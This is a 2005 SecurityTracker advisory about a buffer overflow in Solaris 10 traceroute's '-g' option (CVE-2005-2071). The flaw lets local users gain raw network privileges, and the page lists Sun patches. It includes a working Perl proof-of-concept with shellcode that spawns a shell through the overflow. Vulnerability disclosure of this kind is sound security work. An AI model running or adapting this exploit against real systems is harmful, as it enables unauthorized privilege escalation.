SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (Generic)  >  traceroute Vendors:  Sun
Sun Solaris traceroute(1M) Buffer Overflow in Processing '-g' Parameters Lets Local Users Gain Elevated Privileges
SecurityTracker Alert ID:  1015261
SecurityTracker URL:  http://securitytracker.com/id?1015261
CVE Reference:  CVE-2005-2071   (Links to External Site)
Date:  Nov 24 2005
Impact:  Execution of arbitrary code via local system, User access via local system
Fix Available:  Yes   Exploit Included:  Yes   Vendor Confirmed:  Yes  
Advisory:  Sun Alert
Description:  A vulnerability was reported in traceroute on Sun Solaris. A local user may be able to gain elevated privileges.

A local user can trigger a buffer overflow in traceroute(1M) in the processing of the '-g' command line argument parameters to execute arbitrary code. The code can run with PRIV_NET_RAWACCESS privileges, allowing network layer access.

Solaris 8 and Solaris 9 are not affected.

Przemyslaw Frasunek reported this vulnerability in June 2005.

Some demonstration exploit code is provided:

#!/usr/bin/perl

$ret = 0x8046bb0; # heap, solaris on amd64

$shellcode = "A" x 5000 .
"\xb8\xff\xf8\xff\x3c\xf7\xd0\x50\x31\xc0\xb0\x9a\x50\x89\xe5\x31\xc0\x50\x68\x2f\x2f\ \
x73\x68\x68/bin\x89\xe3\x50\x53\x89\xe2\x50\x52\x53\xb0\x3b\xff\xd5";

$ip = sprintf("%d.%d.%d.%d", $ret & 0xff, ($ret & 0xff00) >> 8, ($ret &
0xff0000) >> 16, ($ret & 0xff000000) >> 24);

$cmd = "/usr/sbin/traceroute -g '$shellcode' -g 2 -g 3 -g 4 -g 5 -g 6 -g 7 -g 8
-g 9 -g 10 $ip";

print $cmd, "\n";

system($cmd);
Impact:  A local user can obtain PRIV_NET_RAWACCESS privileges.
Solution:  Sun has issued the following fix.

SPARC Platform

* Solaris 10 with patch 121012-01 or later

x86 Platform

* Solaris 10 with patch 121013-01 or later
Vendor URL:  sunsolve.sun.com/search/document.do?assetkey=1-26-102060-1 (Links to External Site)
Cause:  Boundary error
Underlying OS:  UNIX (Solaris - SunOS)

Message History:   None.

 Source Message Contents
Date:  Thu, 24 Nov 2005 01:16:56 -0500
Subject:  Security Vulnerabilities in the traceroute(1M) Utility may Allow Elevated Privileges

 
 
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102060-1


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2005, SecurityGlobal.net LLC